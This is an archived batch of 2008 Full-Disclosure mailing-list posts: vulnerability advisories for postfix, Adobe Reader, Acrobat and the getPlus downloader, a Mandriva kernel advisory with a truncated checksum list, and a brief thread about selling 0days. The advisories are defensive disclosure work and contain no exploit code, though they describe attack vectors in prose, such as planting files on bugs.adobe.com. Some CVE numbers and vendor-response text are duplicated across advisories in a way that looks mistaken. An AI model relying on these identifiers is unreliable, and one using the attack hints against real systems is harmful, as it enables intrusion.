rPath Security Advisory: 2008-0311-1
Published: 2008-11-04
Products:
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Local Non-deterministic Denial of Service
Updated Versions:
    postfix=conary.rpath.com at rpl:2/2.4.9-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2769

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3889

Description:
    Previous versions of the postfix package are vulnerable to a local
    Denial of Service attack due to a file-descriptor leak during execution
    of external commands (as may be found in a .forward file, for example).

http://wiki.rpath.com/Advisories:rPSA-2008-0311

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From labs-no-reply at idefense.com  Tue Nov  4 19:43:42 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 04 Nov 2008 14:43:42 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.04.08: Multiple
 Vendor NOS Microsystems getPlus Downloader Stack Buffer Overflow
 Vulnerability
Message-ID: <4910A5EE.1040200@idefense.com>

iDefense Security Advisory 11.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 04, 2008

I. BACKGROUND

The getPlus Download Manager is a software management tool. It is used
to download, install, and update other software through the browser.
The getPlus Download Manager consists of an ActiveX control that is
used to prompt users to install other vendor's software. Adobe uses
this control for web based installations of Adobe Reader. If a client
installed Adobe Reader through the Adobe website, they will have the
control on their system. For more information see the vendor's site at
the following URL.

http://www.adobe.com/support/security/bulletins/apsb08-19.html

II. DESCRIPTION

Remote exploitation of a stack based buffer overflow vulnerability in
NOS Microsystems Ltd.'s getPlus Download Manager, potentially used by
multiple vendors, could allow an attacker to execute arbitrary code
with the privileges of the current user.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the web page. Exploitation
requires that attackers social engineer victims into viewing a
malicious web page. After the user visits the malicious web page, no
further user interaction is needed if the user already has the control
installed.

If the user visiting the web page does not already have the getPlus
control installed, they will be prompted to install it.

This control could potentially be used by a number of different software
vendors. The exploitability of this vulnerability is likely to be
dependent on the way that the given vendor uses the control. In the
case of Adobe Reader, the installation file that triggers the
vulnerability needs to be located on a site ending in adobe.com.
Normally, such a condition would make exploitation significantly more
difficult. However, in this case, by using the http://bugs.adobe.com
site, an attacker can place arbitrary text files onto the site. These
files are supposed to contain information relevant to bug reports, but
this functionality could be abused by an attacker for the purpose of
exploitation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in getPlus
gp.ocx version 1.2.2.50, which is used in web based installations of
Adobe Reader 8.1. Previous versions may also be affected. In order to
determine if this version of the control is installed, the Registry
Editor can be used to attempt to browse to the registry key:

HKEY_CLASSES_ROOT\CLSID\{CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7}

If that key exists, then the control is installed.

V. WORKAROUND

Setting the kill bit for this control will mitigate the threat of web
based attacks which could be conducted through Internet Explorer. The
CLSID for the vulnerable control is

CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7

VI. VENDOR RESPONSE

Adobe reports that the input validation issue in the Download Manager
used by Adobe Reader has been resolved. Adobe has released an update
which addresses this issue. For more information, consult their
advisory at the following URL.

http://www.adobe.com/support/security/bulletins/apsb08-19.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4817 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/05/2008  Initial Vendor Notification
02/06/2008  Initial Vendor Reply
10/31/2008  Additional Vendor Feedback
11/04/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Peter Vreugdenhil.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From labs-no-reply at idefense.com  Tue Nov  4 21:03:09 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 04 Nov 2008 16:03:09 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.04.08: Adobe Reader
 Embedded Font Handling Out of Bounds Array Indexing Vulnerability
Message-ID: <4910B88D.2020906@idefense.com>

iDefense Security Advisory 11.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 04, 2008

I. BACKGROUND

Adobe Acrobat Reader is a program for viewing Portable Document Format
(PDF) documents. More information is available at the following site:

http://www.adobe.com/products/reader/

II. DESCRIPTION

Remote exploitation of an out of bounds array access vulnerability in
Adobe System Inc.'s Adobe Reader could allow an attacker to execute
arbitrary code as the current user.

The vulnerability specifically exists in code responsible for parsing
Type 1 fonts. After allocating an area of memory, no bounds checking is
performed. Subsequent access of this memory may result in modification
of arbitrary memory, which in turn may result in arbitrary code
execution.

III. ANALYSIS

Exploitation of this vulnerability would allow a remote attacker to
execute arbitrary code as the current user. In order to exploit this
vulnerability, the attacker would have to convince the target user to
open a maliciously crafted file, either by opening an email attachment
or visiting a website which contained an embedded PDF file. No further
interaction is required. The Explorer extension which displays the
thumbnail view of the document, AcroRd32Info, is also vulnerable. This
may allow the vulnerability to be exploited by simply clicking on a PDF
file without opening it, even from a network share.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Adobe
Reader version 8.1.1. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workarounds for this
issue.

Configuring the application not to open in the browser may mitigate
exposure to some web-based attacks.

VI. VENDOR RESPONSE

Adobe has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.adobe.com/support/security/bulletins/apsb08-19.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4812 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/27/2007  Initial Vendor Notification
12/28/2007  Initial Vendor Reply
10/31/2008  Additional Vendor Feedback
11/04/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by to Greg MacManus of iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From zdi-disclosures at 3com.com  Tue Nov  4 20:53:57 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 4 Nov 2008 14:53:57 -0600
Subject: [Full-disclosure] ZDI-08-072: Adobe Acrobat PDF Javascript printf
 Stack Overflow Vulnerability
Message-ID: <OF417DD77F.30E0C926-ON882574F7.0071B433-862574F7.0072CD6C@3com.com>

ZDI-08-072: Adobe Acrobat PDF Javascript printf Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-072
November 4, 2008

-- CVE ID:
CVE-2008-2992

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat. User interaction is required
to exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.

The specific flaw exists in the handling of embedded Javascript code
when opening a PDF.  Adobe Acrobat has defined it's own set of
Javascript functions that can be used in a PDF file.  Due to improper
parameter checking to one of these functions arbitrary memory can be
over-written leading to remote code execution.  If successfully
exploited remote control of the target system can be gained with the
credentials of the logged in user.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

-- Disclosure Timeline:
2008-01-21 - Vulnerability reported to vendor
2008-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreugdenhil

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Tue Nov  4 20:54:33 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 4 Nov 2008 14:54:33 -0600
Subject: [Full-disclosure] ZDI-08-074: Adobe Acrobat PDF Javascript
 getCosObj Memory Corruption Vulnerability
Message-ID: <OF51D9D217.A7733BC8-ON882574F7.0071B55B-862574F7.0072DB43@3com.com>

ZDI-08-074: Adobe Acrobat PDF Javascript getCosObj Memory Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-074
November 4, 2008

-- CVE ID:
CVE-2008-4813

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5941. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute code on vulnerable
installations of Adobe Acrobat. User interaction is required in that a
user must visit a malicious web site.

The specific flaw exists when processing malicious javascript contained
in a PDF document.  When creating a Collab object and performing a
specific sequence of actions on it, memory corruption occurs potentially
resulting in remote code execution.  If successfully exploited full
control of the affected machine running under the credentials of the
currently logged in user can be achieved.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

-- Disclosure Timeline:
2008-05-12 - Vulnerability reported to vendor
2008-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreudegnhil

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From zdi-disclosures at 3com.com  Tue Nov  4 20:54:15 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 4 Nov 2008 14:54:15 -0600
Subject: [Full-disclosure] ZDI-08-073: Adobe Acrobat Reader Malformed PDF
	Code Execution Vulnerability
Message-ID: <OFEDAEC103.8351ED90-ON882574F7.0071B4C4-862574F7.0072D444@3com.com>

ZDI-08-073: Adobe Acrobat Reader Malformed PDF Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-073
November 4, 2008

-- CVE ID:
CVE-2008-4813

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6043. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat and Adobe Reader. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious web address or open a malicious file.

The specific flaw exists within the parsing of PDF objects defined in
the file. When a specific object becomes malformed, a small memory
corruption occurs which can be leveraged by an attacker to execute
arbitrary code under the context of the current user.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

-- Disclosure Timeline:
2008-04-08 - Vulnerability reported to vendor
2008-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Javier Vicente Vallejo

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. 

From geeky.one at hotmail.com  Tue Nov  4 21:54:42 2008
From: geeky.one at hotmail.com (John Allison)
Date: Tue, 4 Nov 2008 16:54:42 -0500
Subject: [Full-disclosure] Odays offers
In-Reply-To: <4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
	<6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
	<cb7d6d2e0811040148w5fbf7071j5be3d3f51a4a087@mail.gmail.com> 
	<4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>
Message-ID: <BLU128-W38BD4B20DD2D6858D1907FF01C0@phx.gbl>


Why would a Whitehat want zone-h shutdown?  That makes no sense at all.

> Date: Tue, 4 Nov 2008 13:57:56 +0000
> From: xploitable at gmail.com
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Odays offers
> 
> now maybe he should shut down his zone-h site as well and keep
> whitehats happy :)
> 
> On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois
> <badzmanaois at gmail.com> wrote:
> > sell 'em at wabisabilabi.
> >
> > ops, too late:
> >
> > http://www.techworld.com/security/news/index.cfm?newsID=106294
> >
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_________________________________________________________________
Store, manage and share up to 5GB with Windows Live SkyDrive.
http://skydrive.live.com/welcome.aspx?provision=1?ocid=TXT_TAGLM_WL_skydrive_102008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081104/617b3d4f/attachment.html 

From labs-no-reply at idefense.com  Tue Nov  4 22:07:32 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 04 Nov 2008 17:07:32 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.04.08: Adobe
 Acrobat And Reader AcroJS Heap Corruption Vulnerability
Message-ID: <4910C7A4.8040205@idefense.com>

iDefense Security Advisory 11.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 04, 2008

I. BACKGROUND

Adobe Reader is a program for viewing Portable Document Format (PDF)
documents. Acrobat is the program used to create such documents. More
information is available at the following URLs.

http://www.adobe.com/products/acrobat/

http://www.adobe.com/products/reader/

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Adobe Systems
Inc.'s Acrobat Professional and Reader could allow an attacker to
execute arbitrary code with the privileges of the current user.

The vulnerable code is an AcroJS function available to scripting code
inside of a PDF document. This function is used for HTTP
authentication. By passing a long string to this function, it is
possible to corrupt heap memory in such a way that may lead to the
execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability would allow an attacker to execute
arbitrary code with the privileges of the current user. In order to
exploit this vulnerability, an attacker would have to convince the
target to open a maliciously constructed file, or to visit a website
with an embedded PDF. If the user has the Adobe Reader Browser plugin
enabled, the PDF file will render inside of the browser.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Acrobat
Professional and Adobe Reader version 8.1.2. Previous versions may also
be affected.

V. WORKAROUND

Disabling JavaScript in Adobe Reader or Acrobat will limit exposure to
this vulnerability. When JavaScript is disabled, Adobe Reader will
prompt the user that some components of the document may not function,
and provide an opportunity to enable it.

VI. VENDOR RESPONSE

Adobe reports that the input validation issue in the Download Manager
used by Adobe Reader has been resolved and has released a patch which
addresses this issue. A patch is available from the vendor at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4817 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/21/2008  Initial Vendor Notification
04/28/2008  Additional iDefense Data Provided to Vendor
06/26/2008  Additional Vendor Follow-up
11/04/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by an anonymous contributor.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From security at mandriva.com  Tue Nov  4 23:21:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 04 Nov 2008 16:21:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:224 ] kernel
Message-ID: <E1KxVCn-0002Os-2S@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:224
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kernel
 Date    : November 4, 2008
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 The error-reporting functionality in (1) fs/ext2/dir.c, (2)
 fs/ext3/dir.c, and possibly (3) fs/ext4/dir.c in the Linux kernel
 2.6.26.5 does not limit the number of printk console messages that
 report directory corruption, which allows physically proximate
 attackers to cause a denial of service (temporary system hang) by
 mounting a filesystem that has corrupted dir->i_size and dir->i_blocks
 values and performing (a) read or (b) write operations. NOTE:
 there are limited scenarios in which this crosses privilege
 boundaries. (CVE-2008-3528)
 
 The i915 driver in (1) drivers/char/drm/i915_dma.c in the Linux kernel
 2.6.24 on Debian GNU/Linux and (2) sys/dev/pci/drm/i915_drv.c in
 OpenBSD does not restrict the DRM_I915_HWS_ADDR ioctl to the Direct
 Rendering Manager (DRM) master, which allows local users to cause
 a denial of service (memory corruption) via a crafted ioctl call,
 related to absence of the DRM_MASTER and DRM_ROOT_ONLY flags in the
 ioctl's configuration. (CVE-2008-3831)
 
 The do_splice_from function in fs/splice.c in the Linux kernel before
 2.6.27 does not reject file descriptors that have the O_APPEND flag
 set, which allows local users to bypass append mode and make arbitrary
 changes to other locations in the file. (CVE-2008-4554)
 
 Additionaly, a problem with TCP options ordering, which could manifest
 as connection problems with many websites (bug #43372), was solved, a
 number of fixes for Intel HDA were added, another number of fixes for
 issues on Asus EEE PC, Panasonic Let's Note, Acer One, Dell XPS, and
 others, were also added. Check package changelog for more information.
 
 
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3528
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3831
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4554
 https://qa.mandriva.com/43532
 https://qa.mandriva.com/43372
 https://qa.mandriva.com/44752
 https://qa.mandriva.com/43885
 https://qa.mandriva.com/44803
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 c48d2bb1d3774b71a6623b256f6c4f83  2009.0/i586/alsa_raoppcm-kernel-2.6.27.4-desktop-1mnb-0.5.1-2mdv2008.0.i586.rpm
 202c6c1b09d04722db4ddc0497bef5cc  2009.0/i586/alsa_raoppcm-kernel-2.6.27.4-desktop586-1mnb-0.5.1-2mdv2008.0.i586.rpm
 8ac9540e9e12e0e2cf30c726ba272500  2009.0/i586/alsa_raoppcm-kernel-2.6.27.4-server-1mnb-0.5.1-2mdv2008.0.i586.rpm
 015002ee6207c3361f5217351624456a  2009.0/i586/alsa_raoppcm-kernel-desktop586-latest-0.5.1-1.20081103.2mdv2008.0.i586.rpm
 3bdf9ab3eda9d88a82514005cdfb5cd6  2009.0/i586/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20081103.2mdv2008.0.i586.rpm
 c6f76c7f7b8028cfdbae54aefa729fd7  2009.0/i586/alsa_raoppcm-kernel-server-latest-0.5.1-1.20081103.2mdv2008.0.i586.rpm
 89ff74917cd72f72659688261f5ebba5  2009.0/i586/drm-experimental-kernel-2.6.27.4-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 1b0cdaa41cd3e458adf69a9a8e3f4203  2009.0/i586/drm-experimental-kernel-2.6.27.4-desktop586-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 4d198b8b510f9a07cc3b3b2ba55b6b3c  2009.0/i586/drm-experimental-kernel-2.6.27.4-server-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 a4327edcdb26e966395b8a9513aa171b  2009.0/i586/drm-experimental-kernel-desktop586-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.i586.rpm
 3a0dd8c85e258e9f654cb13090e15438  2009.0/i586/drm-experimental-kernel-desktop-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.i586.rpm
 e7a7ee1d4c0b979771e9baf6abc85033  2009.0/i586/drm-experimental-kernel-server-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.i586.rpm
 af511c4686b2820fae99f31297f36aa8  2009.0/i586/et131x-kernel-2.6.27.4-desktop-1mnb-1.2.3-7mdv2009.0.i586.rpm
 4b2481d43b77791257bc3cb0124c413c  2009.0/i586/et131x-kernel-2.6.27.4-desktop586-1mnb-1.2.3-7mdv2009.0.i586.rpm
 741cd51c6595bad42a021a21b0253fc8  2009.0/i586/et131x-kernel-2.6.27.4-server-1mnb-1.2.3-7mdv2009.0.i586.rpm
 069cfc2703e7bcf2a39aa451224cdb07  2009.0/i586/et131x-kernel-desktop586-latest-1.2.3-1.20081103.7mdv2009.0.i586.rpm
 75ed8f890dbcd39f0a155c0ab08bcf03  2009.0/i586/et131x-kernel-desktop-latest-1.2.3-1.20081103.7mdv2009.0.i586.rpm
 54ca985a900bcd86b14b5a8cab9d33bf  2009.0/i586/et131x-kernel-server-latest-1.2.3-1.20081103.7mdv2009.0.i586.rpm
 5ee146655ecf0ac585c0129803bcd45e  2009.0/i586/fcpci-kernel-2.6.27.4-desktop-1mnb-3.11.07-7mdv2009.0.i586.rpm
 6ddc302017e530f6604a16e1cbec7cdd  2009.0/i586/fcpci-kernel-2.6.27.4-desktop586-1mnb-3.11.07-7mdv2009.0.i586.rpm
 59f461190dc1e0bb736e557d5efd504d  2009.0/i586/fcpci-kernel-2.6.27.4-server-1mnb-3.11.07-7mdv2009.0.i586.rpm
 69c5452b64dd9bde0a1602e66f47d8b8  2009.0/i586/fcpci-kernel-desktop586-latest-3.11.07-1.20081103.7mdv2009.0.i586.rpm
 8651b4f4f1c7dac29ed70874551db215  2009.0/i586/fcpci-kernel-desktop-latest-3.11.07-1.20081103.7mdv2009.0.i586.rpm
 f0429eaf6769238ea2176c82395c4d7c  2009.0/i586/fcpci-kernel-server-latest-3.11.07-1.20081103.7mdv2009.0.i586.rpm
 0c67752b93e05863ee1589336e7a9093  2009.0/i586/fglrx-kernel-2.6.27.4-desktop-1mnb-8.522-3mdv2009.0.i586.rpm
 31a0bc181d9af20326c495a1b7c7fed0  2009.0/i586/fglrx-kernel-2.6.27.4-desktop586-1mnb-8.522-3mdv2009.0.i586.rpm
 2c9acc9a451ddbca0238c527312c924c  2009.0/i586/fglrx-kernel-2.6.27.4-server-1mnb-8.522-3mdv2009.0.i586.rpm
 8be1aa81b136840da0938baa35b3f7d2  2009.0/i586/fglrx-kernel-desktop586-latest-8.522-1.20081103.3mdv2009.0.i586.rpm
 4bfcde8e25c309060e7097e86d6d1c06  2009.0/i586/fglrx-kernel-desktop-latest-8.522-1.20081103.3mdv2009.0.i586.rpm
 5b071fb3eaf1da8e28ad408f0638b894  2009.0/i586/fglrx-kernel-server-latest-8.522-1.20081103.3mdv2009.0.i586.rpm
 adce3213d65a4d3017677dfbd554f9bd  2009.0/i586/gnbd-kernel-2.6.27.4-desktop-1mnb-2.03.07-2mdv2009.0.i586.rpm
 6881d105b0922006c6c983caf8eadfc3  2009.0/i586/gnbd-kernel-2.6.27.4-desktop586-1mnb-2.03.07-2mdv2009.0.i586.rpm
 4751069159264ea73226e2e07657a592  2009.0/i586/gnbd-kernel-2.6.27.4-server-1mnb-2.03.07-2mdv2009.0.i586.rpm
 67727f09bd8e277730c46b83fea9e075  2009.0/i586/gnbd-kernel-desktop586-latest-2.03.07-1.20081103.2mdv2009.0.i586.rpm
 920125f12d8cf4d7b63a98c92542770f  2009.0/i586/gnbd-kernel-desktop-latest-2.03.07-1.20081103.2mdv2009.0.i586.rpm
 4eb4aff3fe68e941e7de052c9bafb33a  2009.0/i586/gnbd-kernel-server-latest-2.03.07-1.20081103.2mdv2009.0.i586.rpm
 5b1ee0f4c4423f8523933e39e32d891b  2009.0/i586/hcfpcimodem-kernel-2.6.27.4-desktop-1mnb-1.17-1mdv2009.0.i586.rpm
 979e1c360cd8ec372e91a656df83b21e  2009.0/i586/hcfpcimodem-kernel-2.6.27.4-desktop586-1mnb-1.17-1mdv2009.0.i586.rpm
 6c350f38967f95a22d64acd39933416f  2009.0/i586/hcfpcimodem-kernel-2.6.27.4-server-1mnb-1.17-1mdv2009.0.i586.rpm
 49fe7439c13535f85891b58c58a1fd78  2009.0/i586/hcfpcimodem-kernel-desktop586-latest-1.17-1.20081103.1mdv2009.0.i586.rpm
 52ffa2df274b39341d15c1ed1560ec0f  2009.0/i586/hcfpcimodem-kernel-desktop-latest-1.17-1.20081103.1mdv2009.0.i586.rpm
 5593d00443f63f48b25d765a35d44381  2009.0/i586/hcfpcimodem-kernel-server-latest-1.17-1.20081103.1mdv2009.0.i586.rpm
 30bbd8bf2d741a3e6b07316a26256de4  2009.0/i586/hsfmodem-kernel-2.6.27.4-desktop-1mnb-7.68.00.13-1mdv2009.0.i586.rpm
 cc32e3e9eadcea786c4d399377d282ea  2009.0/i586/hsfmodem-kernel-2.6.27.4-desktop586-1mnb-7.68.00.13-1mdv2009.0.i586.rpm
 b8d5496cac54595c0da2307ff97221f8  2009.0/i586/hsfmodem-kernel-2.6.27.4-server-1mnb-7.68.00.13-1mdv2009.0.i586.rpm
